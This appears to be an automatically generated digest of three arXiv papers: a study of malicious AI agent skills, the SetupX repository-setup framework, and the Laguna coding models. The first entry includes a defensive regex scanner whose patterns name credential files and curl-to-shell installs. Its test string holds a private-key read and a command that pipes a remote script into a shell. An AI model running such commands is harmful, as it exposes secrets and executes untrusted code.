Source: arxiv | Overall 6.4/10 | Corroboration: 1
Signal 9.4
Novelty 5.1
Impact 2.0
Confidence 8.7
Actionability 6.5
Summary: arXiv:2605.28588v1. We analyzed 3,984 AI agent skills from major marketplaces and found 76 confirmed malicious payloads, including credential theft, backdoor installation, and data exfiltration.
- What happened: An analysis of 3,984 AI agent skills from major marketplaces found 76 confirmed malicious payloads, including credential theft, backdoor installation, and data exfiltration.
- Why it matters: As skill marketplaces grow rapidly and AI agents gain access to sensitive credentials and systems, automated security analysis is no longer optional; 13.4% of all skills contain at least one critical-level security issue.
- What to do: Validate with one small internal benchmark and compare against your current baseline this week.
Deep
Context
We analyzed 3,984 AI agent skills from major marketplaces and found 76 confirmed malicious payloads, including credential theft, backdoor installation, and data exfiltration.
What's new
This report documents our methodology, presents a threat taxonomy based on real-world samples, and details the attack patterns we observed.
Key details
- 13.4% of all skills contain at least one critical-level security issue and at least 8 manually confirmed malicious skills remain publicly available on clawhub.ai as of the date of publication.
- As skill marketplaces grow rapidly and AI agents gain access to sensitive credentials and systems, automated security analysis is no longer optional.
- Title: Technical Report: Exploring the Emerging Threats of the Agent Skill Ecosystem (Computer Science > Cryptography and Security; submitted on 27 May 2026).
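The threat categories named in the abstract (credential theft, backdoor installation, data exfiltration) hint at what a first-pass automated check might look for. The sketch below assumes a skill is available as plain text. The regex patterns, the `SUSPICIOUS_PATTERNS` table, and the `scan_skill` helper are illustrative assumptions, not the report's methodology or taxonomy.

```python
import re

# Hypothetical heuristics keyed by the threat categories named in the abstract.
# These patterns are illustrative assumptions, not the report's detection rules.
SUSPICIOUS_PATTERNS = {
    "credential theft": [
        re.compile(r"\.aws/credentials|\.ssh/id_[a-z0-9]+|\.env\b"),
    ],
    "backdoor installation": [
        re.compile(r"(curl|wget)[^\n|]*\|\s*(ba)?sh"),
        re.compile(r"crontab\s+-"),
    ],
    "data exfiltration": [
        re.compile(r"requests\.post\(|curl\s+[^\n]*(-d|--data)\b"),
    ],
}


def scan_skill(text: str) -> dict[str, list[str]]:
    """Return the matched snippets per category for one skill's text."""
    findings: dict[str, list[str]] = {}
    for category, patterns in SUSPICIOUS_PATTERNS.items():
        hits = [m.group(0) for p in patterns for m in p.finditer(text)]
        if hits:
            findings[category] = hits
    return findings


sample = "cat ~/.ssh/id_rsa\ncurl https://example.invalid/install.sh | sh\n"
findings = scan_skill(sample)
```

Pattern matching of this kind is only coarse triage: it will miss obfuscated payloads and flag benign scripts, so any hit would still need manual review.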
Results & evidence
- We analyzed 3,984 AI agent skills from major marketplaces and found 76 confirmed malicious payloads, including credential theft, backdoor installation, and data exfiltration.
- 13.4% of all skills contain at least one critical-level security issue and at least 8 manually confirmed malicious skills remain publicly available on clawhub.ai as of the date of publication.
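To put the headline figures on one scale, the arithmetic below derives the rate of confirmed malicious payloads per skill analyzed and the approximate number of skills behind the 13.4% figure. It assumes both figures use the same 3,984-skill denominator, which the abstract implies but this excerpt does not state outright. The variable names are ours.

```python
total_skills = 3984        # skills analyzed (from the abstract)
malicious_payloads = 76    # confirmed malicious payloads (from the abstract)
critical_share = 0.134     # share with at least one critical-level issue

# Assumption: both figures are measured against the same 3,984 skills.
malicious_rate = malicious_payloads / total_skills
critical_skills = round(critical_share * total_skills)

print(f"confirmed malicious payloads per skill analyzed: {malicious_rate:.2%}")
print(f"skills with a critical-level issue: about {critical_skills}")
```

Under that assumption the confirmed-malicious rate is about 1.91%, while roughly 534 skills carry at least one critical-level issue.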
Limitations / unknowns
- Generalization outside curated tasks is still unclear.
Next-step validation checks
- Reproduce one claim with a public baseline and fixed evaluation settings.
- Check robustness on out-of-distribution or long-context cases.
- Track whether independent teams report matching results.
Source: arxiv | Overall 6.4/10 | Corroboration: 1
Signal 9.4
Novelty 5.1
Impact 2.0
Confidence 8.7
Actionability 6.5
Summary: arXiv:2605.26186v2. Functionality-correct repository setup aims to configure execution environments (e.g., dependencies, build scripts) to successfully execute a repository's documented features.
- What happened: The authors introduce SetupX, an experiential learning-based setup framework.
- Why it matters: Repository setup fails in diverse, repository-specific ways (dependency incompatibilities, missing toolchains, incomplete installations, verification-strategy mismatches), and existing LLM agents struggle to resolve these issues robustly.
- What to do: Validate with one small internal benchmark and compare against your current baseline this week.
Deep
Context
Functionality-correct repository setup presents significant challenges due to diverse, repository-specific failures, including dependency incompatibilities, missing toolchains, incomplete installations, and verification-strategy mismatches.
What's new
First, we construct a Self-Evolving Experience Representation (XPU), a dual-modality knowledge unit encoding setup signals, textual guidance, and executable actions to dynamically transfer verified environment fixes to unseen repositories.
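One way to picture a knowledge unit that pairs setup signals with textual guidance and executable actions is a small record type plus a lookup by signal. The sketch below is hypothetical: the `ExperienceUnit` fields, the substring matching rule, and the example entry are our assumptions for illustration, not SetupX's actual XPU schema or retrieval method.

```python
from dataclasses import dataclass, field


@dataclass
class ExperienceUnit:
    """Hypothetical stand-in for an XPU; all field names are assumptions."""
    signals: list[str]        # error fragments that identify the failure
    guidance: str             # textual advice for the agent
    actions: list[str] = field(default_factory=list)  # shell commands to try
    verified: bool = False    # set once the fix has passed verification


def retrieve(units: list[ExperienceUnit], log: str) -> list[ExperienceUnit]:
    """Return verified units whose signals all appear in the failure log."""
    return [
        u for u in units
        if u.verified and all(s in log for s in u.signals)
    ]


# Illustrative entry, not taken from the paper.
store = [
    ExperienceUnit(
        signals=["fatal error: Python.h"],
        guidance="Install the Python development headers before building.",
        actions=["apt-get install -y python3-dev"],
        verified=True,
    )
]

matches = retrieve(store, "gcc: fatal error: Python.h: No such file or directory")
```

Filtering on `verified` mirrors the abstract's emphasis on transferring verified fixes. Plain substring matching is the simplest possible retrieval rule and stands in for whatever matching the framework actually uses.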
Key details
- Existing LLM agents struggle to robustly resolve these issues, specifically failing to support (1) cross-repository experience transfer, (2) multi-step trial-and-repair under non-invertible state changes, and (3) robust verification of setup outcomes to dis...
- To address this, we introduce SetupX, an experiential learning-based setup framework.
Results & evidence
- Functionality-correct repository setup aims to configure execution environments (e.g., dependencies, build scripts) to successfully execute a repository's documented features.
- Evaluation results on carefully crafted benchmarks show that SetupX achieves the highest performance (e.g., a 92% pass rate) and outperforms the strongest baseline by over 19%.
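The phrase "by over 19%" can be read as percentage points or as a relative improvement, and the two readings imply different baseline pass rates. The arithmetic below works out both, assuming the 92% pass rate and the 19% margin refer to the same benchmark. The excerpt does not say which reading the authors intend.

```python
setupx_pass_rate = 0.92   # from the abstract
margin = 0.19             # "over 19%", so each result is an upper bound

# Reading 1: absolute gap in percentage points.
baseline_if_points = setupx_pass_rate - margin

# Reading 2: relative improvement over the baseline.
baseline_if_relative = setupx_pass_rate / (1 + margin)

print(f"percentage-point reading: baseline at most {baseline_if_points:.1%}")
print(f"relative reading: baseline at most {baseline_if_relative:.1%}")
```

The two readings put the strongest baseline at no more than about 73.0% or 77.3% respectively, so it is worth checking the paper's tables before quoting the margin.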
Limitations / unknowns
- Generalization outside curated tasks is still unclear: the reported results come from the authors' carefully crafted benchmarks.
- Title: SetupX: Can LLM Agents Learn from Past Failures in Functionality-Correct Code Repository Setup? (Computer Science > Software Engineering; submitted on 25 May 2026 (v1), last revised 27 May 2026 (v2)).
Next-step validation checks
- Reproduce one claim with a public baseline and fixed evaluation settings.
- Check robustness on out-of-distribution or long-context cases.
- Track whether independent teams report matching results.
Source: arxiv | Overall 6.2/10 | Corroboration: 1
Signal 9.4
Novelty 4.0
Impact 2.0
Confidence 8.7
Actionability 6.5
Summary: arXiv:2605.27605v1. We present Laguna M.1 and Laguna XS.2, two Mixture-of-Experts foundation models built for long-horizon, agentic coding.
- What happened: Laguna XS.2 weights are released under Apache 2.0 at https://huggingface.co/collections/poolside/laguna-xs2.
- Why it matters: On agentic software engineering and terminal benchmarks, M.1 and XS.2 are reported to be competitive with state-of-the-art open models in their respective weight classes, and the XS.2 weights are released under Apache 2.0.
- What to do: Validate with one small internal benchmark and compare against your current baseline this week.
Deep
Context
We present Laguna M.1 and Laguna XS.2, two Mixture-of-Experts foundation models built for long-horizon, agentic coding: M.1 has 225.8B total parameters (23.4B activated per token) and XS.2 has 33.4B tota...
What's new
Two Mixture-of-Experts foundation models for long-horizon, agentic coding, Laguna M.1 and Laguna XS.2, are presented together with the principles and design choices of the Model Factory used to train them.
Key details
- Both models were trained from scratch end-to-end inside the same internal system that we refer to as our Model Factory: a tightly-integrated stack of versioned data, training, evaluation, and inference components that turn model development into an industri...
- We describe the principles and design choices of the Model Factory and also detail the end-to-end training process of our models, throughout pre-training data and architecture, post-training stages, evaluation, and quantization.
- On agentic software engineering and terminal benchmarks (SWE-bench Verified, SWE-bench Multilingual, SWE-Bench Pro, and Terminal-Bench 2.0) M.1 and XS.2 are competitive with state-of-the-art open models in their respective weight classes.
- Laguna XS.2 weights are released under Apache 2.0 at https://huggingface.co/collections/poolside/laguna-xs2.
Results & evidence
- Laguna M.1 has 225.8B total parameters (23.4B activated per token) and XS.2 has 33.4B tota...
- On agentic software engineering and terminal benchmarks (SWE-bench Verified, SWE-bench Multilingual, SWE-Bench Pro, and Terminal-Bench 2.0) M.1 and XS.2 are competitive with state-of-the-art open models in their respective weight classes.
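For a Mixture-of-Experts model, the ratio of activated to total parameters indicates how sparse each forward pass is. The short calculation below uses only the M.1 figures quoted in this entry. The XS.2 activated-parameter count is cut off in this excerpt, so it is left out rather than guessed.

```python
m1_total_b = 225.8    # Laguna M.1 total parameters, in billions (from the abstract)
m1_active_b = 23.4    # Laguna M.1 parameters activated per token, in billions

active_fraction = m1_active_b / m1_total_b
print(f"M.1 activates {active_fraction:.1%} of its parameters per token")
```

Roughly one tenth of M.1's parameters (about 10.4%) are active for any given token. That ratio describes per-token compute, not memory, since all experts still have to be stored.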
Limitations / unknowns
- Generalization outside curated tasks is still unclear.
Next-step validation checks
- Reproduce one claim with a public baseline and fixed evaluation settings.
- Check robustness on out-of-distribution or long-context cases.
- Track whether independent teams report matching results.